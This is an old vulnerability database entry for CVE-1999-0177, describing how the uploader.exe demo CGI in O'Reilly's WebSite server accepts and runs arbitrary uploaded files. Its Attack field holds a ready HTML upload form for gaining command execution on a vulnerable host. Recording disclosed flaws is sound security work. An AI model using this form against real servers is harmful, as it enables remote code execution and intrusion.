Brief description: O'Reilly's webserver 'website' contains a demo package that contains the cgi-program uploader.exe . Uploader.exe will upload arbitrary files from remote users and, if executable, execute them on the server.
Full description: The uploader.exe program uploads arbitrary files without checking them. It will then execute them.
Components: Website 1.1 (trusted), Website 2.0beta (untrusted)
Systems: Microsoft Windows (trusted)
Effect(s) of exploiting: Attacker can execute commands with webserver's privileges
Detecting the hole:
Fixing the hole:
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0177 -- The uploader program in the WebSite web server allows a remote attacker to execute arbitrary programs.
Attack: Modify the following HTML to includet the proper hostname, then plug the desired CGI program into the form:
<center> <FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/"> <INPUT TYPE=HIDDEN NAME="name" VALUE="Foo"> <INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com> File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR> <INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem"> <INPUT TYPE=SUBMIT VALUE="Upload Now"> </FORM>
Advisories: ISS X-Force http-website-uploader
Related Vulnerabilities:
Reporting: Herman de Vette (herman@info.nl) in BugTraq Message ID: Pine.SUN.3.94.970904165704.19190B-100000@dfw.dfw.net (Thu, 4 Sep 1997 21:38:57 )